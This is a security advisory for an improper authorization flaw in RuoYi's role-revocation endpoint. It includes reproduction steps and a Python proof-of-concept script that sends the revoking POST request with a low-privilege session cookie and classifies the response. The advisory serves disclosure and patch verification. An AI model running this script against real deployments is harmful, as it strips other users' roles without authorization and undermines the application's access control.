yangzongzhuan RuoYi Role Handler Improper Authorization Vulnerability
Vulnerability
An improper authorization vulnerability has been identified in yangzongzhuan RuoYi versions up to and including 4.8.1. The issue is in the Role Handler component, specifically the /system/role/authUser/cancelAll endpoint. An authenticated user can submit arbitrary roleId and userIds values to this endpoint without being subject to the authorization check that should restrict role management, so the requested role assignments are revoked for a caller who is not permitted to manage roles. The vulnerability is exploitable remotely over the network, and a public exploit is available.
Impact
Successful exploitation lets an authenticated user who holds no role-management privilege revoke roles from other users. The consequence depends on which role is removed and from whom: at minimum the affected users lose the access the role granted them, which is a loss-of-integrity and potential denial-of-access issue for the application's authorization model.
Reproduction
To reproduce this vulnerability, log into the system as a low-privilege user, that is, one who is not authorized to manage roles (an administrator is expected to succeed, so testing with one proves nothing). Capture a valid session cookie from any request made by that user. Then send a POST request to /system/role/authUser/cancelAll with the roleId of the role to be revoked and the userIds of the users from whom the role is to be removed. If the server responds with success and the role is no longer assigned to the target users, the authorization check has been bypassed.
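The request described above, as an added example that is not part of the advisory or of RuoYi's own code. It builds the POST with Python's standard library only and classifies the answer so the same check can be run against an unpatched and a patched instance. The comma-separated encoding of userIds, the form-encoded body, and the AjaxResult-style JSON answer (code 0 on success) are assumptions about RuoYi's usual conventions; capture one legitimate request from the UI and adjust if the target differs. The host name and cookie value are placeholders.

```python
"""Build and classify the cancelAll request used to test the RuoYi
role-revocation authorization check. Added example, not RuoYi's code.
Assumptions (verify against a captured UI request):
  - parameters are sent application/x-www-form-urlencoded,
  - userIds is a comma-separated list of numeric ids,
  - the server answers with RuoYi's AjaxResult JSON, code 0 == success.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

CANCEL_ALL_PATH = "/system/role/authUser/cancelAll"


def build_cancel_all_request(base_url, session_cookie, role_id, user_ids):
    """Return a urllib Request that asks the server to revoke role_id from
    every user in user_ids, authenticated only by the captured cookie.

    session_cookie is the raw Cookie header value of a session that
    belongs to a user WITHOUT role-management privileges.
    """
    form = urllib.parse.urlencode({
        "roleId": str(role_id),
        "userIds": ",".join(str(u) for u in user_ids),  # assumed format
    }).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + CANCEL_ALL_PATH,
        data=form,
        method="POST",
        headers={
            "Cookie": session_cookie,
            "Content-Type": "application/x-www-form-urlencoded",
            # Mirror the UI's AJAX calls so a login redirect comes back
            # as a classifiable response instead of an HTML page.
            "X-Requested-With": "XMLHttpRequest",
        },
    )


def classify_response(status, body):
    """Map HTTP status plus body to one of three verdicts.

    "revoked": server reported success, i.e. the bypass worked for a
               caller that should have been refused.
    "denied":  the authorization check fired (HTTP 401/403, or an
               AjaxResult with code 401/403, which is how Shiro failures
               are assumed to surface in RuoYi).
    "unknown": anything else (login page, HTML error, unexpected JSON).
    """
    if status in (401, 403):
        return "denied"
    if status != 200:
        return "unknown"
    try:
        result = json.loads(body)
    except ValueError:
        return "unknown"
    if not isinstance(result, dict):
        return "unknown"
    code = result.get("code")
    if code == 0:
        return "revoked"
    if code in (401, 403):
        return "denied"
    return "unknown"


def run_check(base_url, session_cookie, role_id, user_ids, opener=None):
    """Send the request and return the verdict. Network errors that carry
    an HTTP status are classified like normal responses."""
    opener = opener or urllib.request.build_opener()
    req = build_cancel_all_request(base_url, session_cookie, role_id, user_ids)
    try:
        with opener.open(req, timeout=10) as resp:
            return classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify_response(err.code, err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    import sys
    # usage: python check_cancel_all.py BASE_URL 'JSESSIONID=...' ROLE_ID USER_ID[,USER_ID...]
    base, cookie, role, users = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
    print(run_check(base, cookie, role, users.split(",")))
```

Run it once with a low-privilege session and once with an administrator's session: the administrator must get "revoked" (it proves the request format is right), and a vulnerable instance returns "revoked" for the low-privilege session as well, where a correctly authorized endpoint returns "denied". Confirm the effect independently in the role's user list rather than trusting the JSON alone.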
